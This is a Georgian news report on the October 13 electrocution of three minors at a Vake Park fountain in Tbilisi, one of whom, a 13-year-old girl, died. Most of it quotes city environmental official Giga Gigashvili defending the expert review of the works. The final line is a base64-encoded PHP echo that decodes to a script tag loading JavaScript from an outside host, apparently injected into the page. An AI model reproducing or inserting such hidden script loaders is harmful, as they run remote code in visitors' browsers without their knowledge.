celsiusi
ავერსი საქკაბელი
ექსპერტიზით ნათქვამი იყო, რომ განხორციელებული სამუშაოები სრულად შეესაბამებოდა საპროექტო დოკუმენტაციას, სრულ შესაბამისობაში იყო საქართველოში მოქმედ სამშენებლო ნორმებთან და წესებთან, – ამის შესახებ თბილისის მერიის გარემოს დაცვის საქალაქო სამსახურის უფროსმა გიგა გიგაშვილმა, ვაკის პარკში მომხდარ ტრაგიკულ შემთხვევასთან დაკავშირებით, გამოკითხვის დასრულების შემდეგ ჟურნალისტებს განუცხადა.
 
გიგაშვილის  თქმით, პირადად მისი ინტერესია სიმართლე გაირკვეს და დადგინდეს, რამ გამოიწვია ტრაგედია.
 
„მე სრულად ვთანამშრომლობ გამოძიებასთან და ყველა აუცილებელ ინფორმაციას, ასევე დოკუმენტურად, დამატებით რამე თუ იქნება საჭირო, რა თქმა უნდა, მივაწვდით. პირველ რიგში, პირადად ჩემი ინტერესია, რომ სიმართლე გაირკვეს და დადგინდეს, რამ გამოიწვია ეს საშინელი ტრაგედია. ჩვენ მაქსიმალურად ვთანამშრომლობთ და იმედი გვაქვს მალე შესაბამის მიზეზს დავადგენთ, რატომ  მოხდა. ეს ყველაფერი არის საჯარო და ნებისმიერ ადამიანს შეუძლია შევიდეს შესყიდვების ელექტრონულ საიტზე, ამოიღოს ინფორმაცია, რა ვალდებულებები გვქონდა ჩვენ, უშუალოდ გარემოს დაცვის სამსახურს და მუნიციპალიტეტს, რა ვალდებულებები ჰქონდა შემსყიდველ კომპანიას, რა ვალდებულებები ჰქონდა ექსპერტს და ა.შ. ჩვენი სამსახურის ვალდებულება ხელშეკრულების შესაბამისად არის, რომ შევამოწმოთ ხელშეკრულებით ნაკისრი ვალდებულებები და მისი შესრულება, რომელსაც ხელს ვაწერთ  მხოლოდ და მხოლოდ შესაბამისი აკრედიტებული ან ლევან სამხარაულის სახელობის ექსპერტიზის ეროვნული ბიუროს დასკვნის საფუძველზე. ამასთან ერთად, მთლიანად ტენდერს და სამუშაოებს ტექნიკურ ზედამხედველობას მუნიციპალიტეტი უწევს. რა თქმა უნდა, არცერთი სამუშაო არ ჩაგვიტარებია, სადაც არ იყო ექსპერტიზა. ეს არის აკრედიტებული ექსპერტიზის ბიურო, რაც გათანაბრებულია ყველა სხვა ექსპერტიზასთან. ამ ექსპერტიზით ნათქვამი იყო, რომ განხორციელებული სამუშაოები სრულად შეესაბამებოდა საპროექტო დოკუმენტაციას და წარმოებული სამუშაოები სრულ შესაბამისობაში იყო საქართველოში მოქმედ სამშენებლო ნორმებთან და წესებთან, ამაზე მეტი დასკვნა ბუნებაში არ არსებობს. რა თქმა უნდა, დასკვნა დიდია, დაახლოებით 500 გვერდი, მას აქვს თავისი დანართები ელექტრონული გაყვანილობის, მილების გაყვანილობის და ჩვენ ეს დასკვნა გადავეცით გამოძიებას“, – განაცხადა გიგა გიგაშვილმა.
 
13 ოქტომბერს, ვაკის პარკში თამაშისას ბავშვებს ბურთი შადრევანში ჩაუვარდათ, მისი ამოღების დროს, სამ არასრულწლოვანს დენმა დაარტყა. სამივე დაშავებული კლინიკებში გადაიყვანეს. ერთ-ერთი მოზარდი, 13 წლის გოგონა კლინიკაში გარდაიცვალა.
 
შინაგან საქმეთა სამინისტრომ მომხდარზე გამოძიება სისხლის სამართლის კოდექსის 240-ე პრიმა მუხლის პირველი ნაწილით დაიწყო, რაც ელექტრო ან თბოენერგიის, გაზის, ნავთობის ან ნავთობპროდუქტების ობიექტზე უსაფრთხოების წესების დარღვევას გულისხმობს.
377
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");